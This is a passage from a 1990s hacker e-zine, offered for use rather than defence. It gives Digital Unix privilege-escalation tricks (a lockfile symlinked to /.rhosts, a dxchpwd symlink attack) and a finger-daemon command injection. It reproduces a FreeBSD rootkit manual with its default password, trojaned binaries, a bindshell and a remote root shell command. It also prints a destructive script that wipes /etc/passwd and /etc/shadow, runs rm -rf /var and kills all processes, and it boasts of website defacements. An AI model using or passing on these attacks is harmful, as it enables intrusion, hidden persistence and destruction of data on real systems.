I've also noticed that the X server setup on some Digital Unix boxes are
insecure. If you have a shell on the machine, try to set your DISPLAY to
localhost:0 or the machines hostname:0, and then run a program like xkey.

Here are some exploits that I havent used or tried before (edited a little):

----------------------------------------------------------------------------

.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.
==========================

H0l4. So here it is another bug for Digital

System: OSF1 my.narco-goverment.sucks.co V4.0 464 alpha

Program: fstab - Static information about file systems and swap partitions
advfsd - Starts the AdvFS graphical user interface daemon
Problemo: It creates a lockfile in tmp with nice permitions :)
/tmp>ls -la

(Blah Blah Blah.....)

-rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile

What the hell to do with it:

Before it creates
ln -s /.rhosts /tmp/fstab.advfsd.lockfile

from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc.

The End - El Fin

Colombia 1997.

.LoW _ _
|\ | _ |(_`|_'
| \|(_)|,_)|_.

Efrain 'ET' Torres

----------------------------------------------------------------------------

This if for Digital Unix 3.x (I've never seen it work.)

$ ls -l /usr/tcb/bin/dxchpwd
-rwsr-xr-x 1 root bin 49152 Jul 25 1995 /usr/tcb/bin/dxchpwd
$ ls -l /tmp/dxchpwd.log
/tmp/dxchpwd.log not found
$ export DISPLAY=:0 (or a remotehost)
$ ln -s /hackfile /tmp/dxchpwd
$ ls -l /hackfile
/hackfile not found
$ /usr/tcb/bin/dxchpwd
(The dxchpwd window will appear. Just enter root for username
and anything for the passwd. You'll get a permission denied
message and the window will close.)
$ ls -l /hackfile
-rw------- 1 root system 0 Nov 16 22:44 /hackfile

----------------------------------------------------------------------------

Remote techniques
-----------------

I don't have too much here except one pretty big hole. Digital Unix 4.x
is blind ip spoofable!!! So, if you can guess or determine a trust
relationship, the machine is yours. Also, when the CERT statd advisory
came out, Digital released a patch. I haven't played around with that, but
it might be worth looking into.

Also, Digital Unix 4.0 sometimes has an 0wned finger daemon, try this..

% finger Ý/bin/w@host

if this gives uptime info etc, it shows the system is vulnerable to this
attack, you can specify any command.. simple to use.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. FreeBSD 2.2.5 rootkit : humble / method
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Ok.. I found this rootkit out on an ftp site somewhere. Anyway, when I got
it, there was a bunch of compile errors and it seemed to be for an older
version of freebsd. So, I took a new source tree from my box and copied the
trojan code from this rootkit into it.. So, this rootkit will work on the
FreeBSD 2.2.5-RELEASE. The rootkit is around 350k in size (compressed) and
it is available from the following :

ftp.sekurity.org/users/so1o
www.technotronic.com/files/ezines/crh
www.fth.org/crh


Ok.. I left out the following trojans and files:

chpass Trojaned! User->r00t
passwd Trojaned! User->r00t
zapbsd2 An improved utmp/wtmp/lastlog type zapper
tripwire Trojaned! Hide changes

but I put in:

marryv11.c good log cleaner.. i put a #define bsd in it

Enjoy,
humble - jmcdonal@unf.edu 1/15/98

Thanks to ducksquak, simpson and sygma for testing.

The
_____ ____ ____ ____
| ___| __ ___ ___| __ ) ___|| _ \
| |_ | '__/ _ \/ _ \ _ \___ \| | | |
| _|| | | __/ __/ |_) |__) | |_| |
|_| |_| \___|\___|____/____/|____/ rootkit 1.2 (1/27/97) by Method

NOTE: This package was heavily influenced by the existing Linux rootkit,
which in turn was adapted from the SunOS rootkit, etc., etc.

UPDATES: 1.0.1 - Fixed some broken Makefile stuff. Made it so inetd does
the right thing on a SIGHUP. Added some extra security to the shell trojans.
1.1 - Added tripwire trojan. Cleaned up some other stuff.
1.2 - Put a password on inetd (Thanks for the suggestion Whoot :)

This package includes the following:

chpass Trojaned! User->r00t
inetd Trojaned! Remote access
login Trojaned! Remote access
ls Trojaned! Hide files
du Trojaned! Hide files
ifconfig Trojaned! Hide sniffing
netstat Trojaned! Hide connections
passwd Trojaned! User->r00t
ps Trojaned! Hide processes
rshd Trojaned! Remote access
syslogd Trojaned! Hide logs
fix File fixer!
addlen File length fixer(!)
zapbsd2 An improved utmp/wtmp/lastlog type zapper
bindshell port/shell type daemon!
tripwire Trojaned! Hide changes
sniffit A kewl sniffz0r!

INSTALLATION:
To install this kit execute the command 'make all install' from the # prompt.
All of the file/password configurations are in config.h so feel free to
modify things to suit your particular fancy. Everything here has been
tested on a FreeBSD-stable distribution. See the note at the end about
what to do if the admin uses tripwire. Also make sure to read the
Makefile and scripts so you know what's going on.

USAGE:
OK I will go through how to use each program one by one. NOTE when I say
password I mean the rootkit password not your users password (d0h!). By
default the rootkit password is "h0tb0x".

chpass - Local user->root. Run ch{sh,fn,pass} then when it asks you
for a new name enter your password.

inetd - Binds a shell to a port for remote access. Adds a shell
exec service on the ingreslock port, type in the rootkit
password to start a shell.

login - Allows login to any account with the rootkit password.
If root login is refused on your terminal login as "r00t".
History logging is disabled if you login using your password.

ls - Trojaned to hide specified files and directories.
The default data file is /dev/ptyr.
All files can be listed with 'ls -/'.
The format of /dev/ptyr is:
ptyr
fbsdrootkit-1.0
pr0n
Use partial filenames. This would hide any files/directories
with the names ptyr, fbsdrootkit-1.0 and pr0n.

du - (see ls)

ifconfig - Modified to remove PROMISC flag on the ethernet device.

netstat - Modified to remove tcp/udp/sockets from or to specified
addresses, paths and ports.
default data file: /dev/ptyq
command 1: hide local address
command 2: hide remote address
command 3: hide local port
command 4: hide remote port
command 5: hide UNIX socket path

example:
1 128.31 <- Hides all local connections from 128.31.X.X
2 128.31.39.20 <- Hides all remote connections to 128.31.39.20
3 8000 <- Hides all local connections from port 8000
4 6667 <- Hides all remote connections to port 6667
5 .term/socket <- Hides all UNIX sockets including the path
.term/socket

passwd - Local user->root. Enter your rootkit password instead of your
old password.

ps - Modified to remove specified processes.
Default data file is /dev/ptyp.
An example data file is as follows:
0 0 Strips all processes running under root
1 p0 Strips tty p0
2 sniffer Strips all programs with the name sniffer
Don't put in the comments, obviously.

rshd - Execute remote commands as root.
Usage: rsh -l rootkitpassword host command
i.e. rsh -l h0tb0x 0wn3d.escape.com /bin/sh -i
would start a root shell.

syslogd - Modified to remove specified strings from logging.
I thought of this one when I was on a system which logged
every connection.. I kept getting pissed off with editing
files every time I connected to remove my hostname. Then I
thought 'Hey dude, why not trojan syslogd?!' and the rest
is history. :)
Default data file is /dev/ptys
Example data file:
evil.com
123.100.101.202
rshd
This would remove all logs containing the strings evil.com,
123.100.101.202 and rshd. Smart! :))

sniffit - An advanced network sniffer. This is pretty kewl and has lots
of filtering options and other stuff. Useful for targetting a
single host or net. Sniffit uses ncurses.

bindshell - This is pretty self-explanatory. Basically it binds a
shell to a port, 31337 by default. Read the source on
this one.

fix - Replaces and fixes timestamp/checksum infomation on files.
I modified this a bit for my own uses and to fix a nasty bug
when replacing syslogd and inetd. The replacement file will
be erased by fix (unlike other versions).

addlen - This quickie modifies the length of files by adding
harmless zeros to the end. Wonder why nobody ever
thought of doing this before. Inspired by a stupid
security tool which checks lengths of setuid files.

zapbsd2 - This improved version of zapbsd writes over entries with
ones instead of zeros. I added some capabilities and
error checking so I raised the number.

TRIPWIRE:
I have done a major improvement of this part. Simply make tripwire and
the script will ask you a few questions and take action depending on your
responses. If both the database file and tripwire binary are read-only
then there is nothing you can do.

SOURCES:
Some of these patches are derived from the original SunOS rootkit. ls,
du, ps, netstat and chpass were done by yours truly. Anything else came
from the Linux rootkit with a few modifications. The idea for tripwire
was my own.

OTHER:
I welcome all comments and questions at method@yikes.com. All complaints
and flames will be sent to /dev/null.

Thanks to OGhost and Phelix for beta testing and advice.

In closing, this kit can only take you so far. Although it covers almost
everything, a competent sysadmin will eventually catch on. Remember,
never let your guard down.
-M

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. l0ckd0wn.sh : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This is what you run when you're root, and you want to l0ckd0wn the system,
useful in the cases of webpage attacks over weekends etc. heh

% cat > l0ckd0wn.sh << STOP
<paste th3 skr1pt sh1t h3re>
STOP
% sh l0ckd0wn.sh
l0ckd0wn in pr0gr3ss.. must run as r00t
%

(then everything will go b00m)

Here it is...
-------------

#!/bin/sh
#
# l0ckd0wn.sh - so1o th3 k1ng.
#
echo "l0ckd0wn in pr0gr3ss.. must run as r00t"
echo "0wned:hahahahaha:666:666:l0ckd0wn m0therfuck3r:/dev/null:/dev/null" > /etc/passwd
echo "0wned:666::::::::" > /etc/shadow
echo "#" > /etc/inetd.conf
echo "#" > /etc/syslog.conf
echo "w0rdup, we b3 0wned" > /etc/issue.net
rm -rf /var
rm /etc/*tmp
rm /bin/login
touch /etc/utmp
touch /etc/wtmp
kill -9 -1

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. VMG 0wned : sw1tch
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

THE SAGA CONTINUES.
===================

we have NFS skill, and they got br0ken.. again, but this time we had a plan :

Mirror of Janet Jackson page (jacko smokes a blunt) :

http://www.hacked.net/exp/com/janetjackson/
-------------------------------------------

Mirror of Rolling Stones page (mick fagg0r goes bald and ph34rz) :

http://www.hacked.net/exp/com/the-rolling-stones/
-------------------------------------------------

Not forgetting the Spice Gurls (b0w) :

http://www.hacked.net/exp/uk/co/vmg/spiceworld/
-----------------------------------------------


ugh, we didn't do it, it was other kids and stuff..

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

= HANSON ARE NEXT, THEY WILL D1E. SO WILL THE BACKSTREET BOYS, OH YES. =

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. The Rhino9 Sentinel : so1o / humble
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Sentinel is a remote auditing tool that myself and humble are developing for
the Rhino9 Security Research Team, it will rock, and we will release the beta
version as soon as we get it finished, it is _very_ fast and effective, we'll
keep y'all posted! Full d0x will be in CRH issue 9.


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. TOTALCON '98 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+------------------------------------+------------------------------------+
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
+------------------------------------+------------------------------------+
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


TotalCon '98 is now a reality, here are preliminary details...
==============================================================

Venue : The Old Firestation, Silver Street, Bristol, ENGLAND
Date : *** POSTPONED, PROBLEMS WITH PREMESIES, stay tuned!@%$ ***
Duration : 36 hours non-stop (midday -> 10:00pm next day)

Cost : œ15 (15 UKP) ON THE DOOR, this will go back into
the event (beer etc.)

What : 12 system network (with additional terminals) along
with full internet access, bring your laptops!

Loud music, live DJ's
Fully licensed bar downstairs / next door
Elite UV and spotlighting

ALOT of cool people
^^^^^^^^^^^^^^^^^^^

*** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER ***


Travel : Easily accessible by car, train, bus, plane or boat.

Accomodation : You can hang around the Firestation or book one of
many good hotels in the immediate area.


Notes : ALL CA$H RAISED AT THE DOOR FROM ENTRANCE FEES WILL
GO BACK INTO THE EVENT! WE WILL PURCHASE GREAT AMOUNTS
OF BEER AND FOOD, PROBABLY EVEN A LAPTOP AS A PRIZE!!


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+------------------------------------+------------------------------------+
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
+------------------------------------+------------------------------------+
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

.-----------.
: :
.-----. `-----. ; .-----.
:. : .--' .' .' : : .:
.-------:::. : : .' .' : . : .:::-------.
`-------:::' :: : .' .' :: : : `:::-------'
:' ::.`--. :::: `-----. ::. : `:
`-----' ::::. : `-----'
`-----------'

[ Team CodeZero ]

gl0b4l m0therfuck3rz, g1v1ng y0u th3 r34l d34l.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
the c0dez squirel returns next issue, he's back from vacation.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT